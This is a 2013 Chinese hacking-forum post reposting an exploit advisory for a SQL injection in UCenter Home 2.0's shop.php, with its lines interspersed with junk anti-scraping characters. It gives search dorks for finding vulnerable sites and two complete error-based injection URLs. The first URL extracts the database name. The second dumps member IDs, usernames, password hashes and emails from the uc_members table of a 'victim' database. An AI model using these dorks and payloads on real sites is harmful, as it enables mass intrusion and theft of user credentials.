找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2137|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

9 S! w0 ]7 v8 k+ E- `$ s( j( [__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  5 H) o& x9 N3 a) u  P) F: L
* a# E1 b9 G+ \
                                 
  ^8 {) C! P4 I+ o$ {5 e$ L6 b* j+ O. x: j" w! @- \7 q# C
*/ Author : KnocKout  * _$ Z; _& v% F. o0 P
' ?6 t3 E" {5 }+ `2 e/ ?
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
- Q% A5 d. c. s- ?
  H+ Y% P' d. a*/ Contact: knockoutr@msn.com  1 y5 c+ ?: }# r$ X

9 }$ Z% D; ^. D' U! \*/ Cyber-Warrior.org/CWKnocKout  6 z0 d2 |  }8 W: F3 e

; S) l2 F; ?. D) v; h  G% \1 w__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  , T& G/ k8 X: p0 p! {
' ?5 L! y; Q, r& L
Script : UCenter Home  
. S; o3 q! \" k6 P" _) W& W
' B4 _, [7 D& z4 bVersion : 2.0  ; M5 T4 ~. w% U8 [" o

7 q) [4 k* N! y( _3 gScript HomePage : http://u.discuz.net/  
( V/ Z# b- b" z3 o- r% E, _
, W  `4 n: M! k& m1 ]7 X__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  . a& E* s2 r5 M
$ b0 |2 [/ p9 S/ x5 ^# z6 Y5 l4 l
Dork : Powered by UCenter inurl:shop.php?ac=view  + x. K' E( J2 n7 [% ?2 F

6 m9 S; D8 \; n" E* P* jDork 2 : inurl:shop.php?ac=view&shopid=  
* P& h+ Z- a9 x; t. E8 L7 u( o: s. U( g/ P
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  : C2 F/ g1 @# `& \) H: O
# N$ e% i" B- R. g: F# ~- \8 n& K
Vuln file : Shop.php  
+ S0 J8 l1 f. R8 b  l
+ m! U) G" ^; [( g% evalue's : (?)ac=view&shopid=  
( Q3 M/ }5 _/ v$ i: h* c4 Q! A
% J: Y9 v# R# L; `Vulnerable Style : SQL Injection (MySQL Error Based)  . X* D2 I- f0 n+ X+ M8 O; n

; F' Z7 E3 L+ R! BNeed Metarials : Hex Conversion  
# }/ a. c  z8 r) j6 a& c  `- i  H/ n
+ ^, O4 y- g: ~% h__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
9 G5 I, v- B0 [9 c" m6 V0 }% r; _" ~$ t3 m5 ~
Your Need victim Database name.   2 Q4 Y+ h" A3 p6 J. k1 }
/ x. p( D  s; j7 z9 e
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
3 X2 L8 C: O) K3 Q' ^# X8 \5 e# Q& `3 Y3 Z+ i0 z9 m0 C4 u
..  
1 B. X/ V9 @% f+ Q# ~
, m6 Y: K) s% ]9 \DB : Okey.  % C' M( G! Z5 Y0 E; ?2 A, y

' M- ?0 E2 x  x, P% U; ]your edit DB `[TARGET DB NAME]`  
9 H" d8 V3 c/ u7 x- F: ]3 p1 Z% v1 B8 P
Example : 'hiwir1_ucenter'  
" m9 [6 y5 p. m4 S, v6 B8 v- F, b5 W
Edit : Okey.  * @  N8 W' n- z6 Z8 x5 |

% H4 s& d3 n; |, l/ [# H" w0 l7 J3 ~Your use Hex conversion. And edit Your SQL Injection Exploit..  : L+ V7 _2 P. G- b! q
- o7 E# p1 }0 M, ^
   
! S6 }$ p" ~0 d: T2 Z4 W$ O0 |) C" y5 G5 u# i& t, I7 E: E
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
! e4 c; P& ]7 |, L4 Z+ Z$ R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表